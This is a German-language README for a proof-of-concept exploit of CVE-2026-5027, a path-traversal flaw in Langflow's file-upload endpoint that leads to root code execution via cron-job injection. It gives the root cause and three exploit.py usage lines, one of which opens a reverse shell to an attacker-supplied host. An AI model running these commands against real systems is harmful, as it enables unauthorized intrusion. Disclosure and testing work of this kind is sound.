
Proof-of-Concept-Exploit für CVE-2026-5027, eine Path-Traversal-Schwachstelle in Langflow, die zu nicht authentifizierter Remote-Code-Ausführung über Cron-Job-Injection führt.
Langflow-Versionen bis einschließlich 1.8.4 bereinigen den Parameter filename im Endpunkt POST /api/v2/files nicht. Ein Angreifer kann Pfad-Traversal-Sequenzen (../) verwenden, um Dateien an beliebige Stellen im Dateisystem zu schreiben. In Kombination mit Langflows Standardkonfiguration für automatische Anmeldung ist dies ohne jegliche Authentifizierung ausnutzbar und führt über Cron-Job-Injektion zu Remote Code Execution als Root.
# Proof of Concept (schreibt Testdatei nach /tmp/)
python3 exploit.py -t http://target:7860
# Mit Anmeldedaten (falls automatische Anmeldung deaktiviert ist)
python3 exploit.py -t http://target:7860 -u admin -p password
# Reverse Shell über Cron-Job
python3 exploit.py -t http://target:7860 --lhost YOUR_IP --lport 4444


Die Funktion upload_user_file() in src/backend/base/langflow/api/v2/files.py übergibt file.filename ohne Bereinigung direkt an den Speicherdienst. Die Methode LocalStorageService.save_file() konstruiert den Pfad mit folder_path / file_name, was Verzeichnis-Traversal nicht verhindert.
Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bereitgestellt. Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben.
Yahia Hamza - https://yh.do